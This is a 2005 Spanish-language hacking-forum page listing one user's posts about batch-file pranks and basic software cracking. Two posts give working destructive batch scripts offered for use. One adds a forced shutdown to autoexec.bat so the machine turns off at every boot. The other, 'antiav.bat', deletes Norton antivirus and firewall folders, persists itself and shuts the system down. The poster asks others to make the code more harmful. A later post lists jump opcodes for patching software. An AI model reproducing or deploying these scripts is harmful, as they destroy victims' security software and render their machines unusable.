elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8
51  Seguridad Informática / Hacking / Re: broma bat!!! en: 2 Septiembre 2005, 03:42 am
pues gracias dArK_gAp prometo seguir ayudando en lo que pueda a este foro y muy pronto (ya estaran hartos)con la pagina web pues se dara más de que hablar.
gracias tambien cool0, aqui en México es la UNAM quien nos ofrece esa idea de elegir el aprendizage (los que son del poli no se molesten)
saludotes!!!
52  Programación / Scripting / Re: batch bat... dos?? alquien sabe en: 28 Agosto 2005, 10:40 am
xDDDDDD .
Citar
No es menospreciar al "script language" batch el decir que "no es un lenguaje de programacion" solo es ser exacto.
por 6 palabras peleas? xDDDDD seré más exacto y espero tu más explicito xDDDDD
saludos
53  Programación / Scripting / Re: batch bat... dos?? alquien sabe en: 25 Agosto 2005, 05:57 am
BRAVO pepel! y si se pueden hacer virus con el batch pero ya la estructura seria más compleja.
POR FAVOR HAGAN UN SUBFORO DE BATCH ES MUY UTIL.
saludos

PD:no es grito de reclamación sino de desesperación o algo así no encuentro la palabra jeje tomenlo en cuenta. gracias
54  Programación / Scripting / Re: batch bat... dos?? alquien sabe en: 23 Agosto 2005, 06:09 am
asi es man se pueden hacer muchos tipos de programas con un un archivo .bat un ejemplo de un virus muy vulgar pero que jode un rato:
@echo off
cd\
shutdown -s -f -t 5 -c "jajaja">>autoexec.bat
y con esto solo estara encendida la makina por 5 segundos cada vez que la encienda. (este solo sirve para w98 pues creo que el xp ya no trae el autoexec.bat pero puedes poner el bat el la carpeta de inicio y solucionado el problema)
en el subforo de documentos y manuales hay un post de batch y si no esta el google
saludos

PD: pa los colaboradores y administradores: me gustaria y querria saber si se pudiera hacer un subforo o subtema (no se como se diga) de batch xfavor echenle un vistaso a esto, creo que es muy util y pues eso es todo aver si me hacen caso.
saludos
55  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 15 Agosto 2005, 02:22 am
si era a ti jvchino muchas gracias con esto ya sera más facil esperen el bat.
saludotes!!
56  Seguridad Informática / Hacking / Re: broma bat!!! en: 15 Agosto 2005, 01:56 am
Citar
Para mi ya termino el tema, dije lo queria decir y demostré lo que queria demostrar.
ya!!!!!
Citar
por favor...
57  Programación / Ingeniería Inversa / Re: Tutorial Cracking Basico by n0sEcReT en: 15 Agosto 2005, 01:25 am
Citar
tambien seria bueno si te gusta el cracking es ASM ( Ensamblador ).
pues creo que es más dificil pero deseguro con uno de tus tuto seguro aprendo.
saludos y  esperare
58  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 14 Agosto 2005, 07:58 am
orale gracias si no es mucho pedir puedes poner un link?
gracias saludos
59  Seguridad Informática / Hacking / Re: broma bat!!! en: 14 Agosto 2005, 07:40 am
dArK_gAp y  tirher gracias por apollarme y sobre todo por no caer en la estupides de cerrarse a  no ver lo que dije en un principio:
Citar
hola, weno que les parece? a alguien se le ocurre algo pa´ hacerlo más dañino o más gracioso?
saludos
tambien postee esto para que cambiaran el codigo y aportaran algo al hack asi que manibal creo que el que debe leer eres TU!
no nos insultes al desmerecernos, por mi parte no solo llevo unos meses en el underground soy todavia chavo y me falta mucho por aprender por el conocimiento nunca llega a su fin pero mi conocimiento lo he demostrado en mas de una ocación. Y no es que diga que sea un master hacker pero no soy lamer como piensas que soy:
Citar
esto tambien se podria usar como un ataque pero no he pensado mucho en eso.
con esto no quiere decir que no haya pensado en cosas maliciosas ¿pero que acaso no es de lamers pensar así??
luego escribes esta verdadera estupides:
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajaja por eso este bello lenguaje nos da la solución:
**antiav.bat**
*---------------------------------------------*
@echo
cd
cd\
del /f /q /s C:\"Archivos de programas"\"Norton AntiVirus"
del /f /q /s C:\"Archivos de programas"\"Norton Persona Firewall"
cls
cd\antiav.bat>>autoexec.bat
shutdown /s /t /f /c "con esto se comprueba que la seguridad es matada por un simple bat"
*----------------------------------------------------*
lo del bucle con for como dije es buena idea y como dijiste crea un D.o.S. imaginense si x cada pantalla abierta nos mandara 5 centavos seraia genial! pero logico que no solo con un bat  es ahí donde quise que propusieran ideas.
Citar
please dark_gap, habla solo de lo que sabes... e intenta mantener un hilo si?

es una pena...
dark_gap??? ? creo que TU nos das pena, alguien de mente tan cerrada (y no diras que como sabes si nio me conoces por que lo has demostrado).

creo que hay más personas como dArK_gAp y  tirher que querran colaborar.

saludos

PD: tadavia me sigo riendo
Citar
SOSTENGO que practicamente no sirve poara nada... porque el ejemplo patetico del que habla dark_gap sirve solo para una maquina sin antivirus, sin firewall real. un rootkit o una backdoor pueden descargarse sin problemas...
jajajajajajajajajajajajajaja luego pongo un ejemplo de una backdoor con un bat para que me de más risa
60  Programación / Ingeniería Inversa / Re: Tutorial Cracking Basico by n0sEcReT en: 12 Agosto 2005, 09:33 am
FELICITACIONES!!!!! te quedo muy chido.
ya que dices que vas a seguir haciendo tutoriales puedo pedir que hagas uno acerca de ResHack?
la verdad no supe porque eliminando 1033 y me gustaria saberlo, yo me he leido unos manuales básicos de crack pero lo que entendia era cambiando simples saltos como:

Hexadecimal Assembler Significa
75 o 0F85 jne Salta si no es equivalente
74 o 0F84 je Salta si es equivalente
EB jmp Salta directamente a . . .
90 nop ( No OPeration ) Sin operación
77 o 0F87 ja Salta si esta sobre
OF86 jna Salta si no esta sobre
0F83 jae Salta si esta sobre o igual
0F82 jnae Salta si no esta sobre o igual
0F82 jb Salta si es inferior
0F83 jnb Salta si no es inferior
0F86 jbe Salta si esta debajo o igual
0F87 jnbe Salta si no esta debajo o igual
0F8F jg Salta si es mayor
0F8E jng Salta si no es mayor
0F8D jge Salta si es mayor o igual
0F8C jnge Salta si no es mayor o igual
0F8C jl Salta si es menor
0F8D jnl Salta si no es menor
0F8E jle Salta si es menor o igual
0F8F jnle Salta si no es menor o igual

pero con esto me he quedado  :o haci que si puedes pues te apoyo con lo que pueda para que hagas ese tutorial y me expliques mi duda.
gracias y otra vez FELICIDADES!!!!!!
saludotes!!!!
Páginas: 1 2 3 4 5 [6] 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines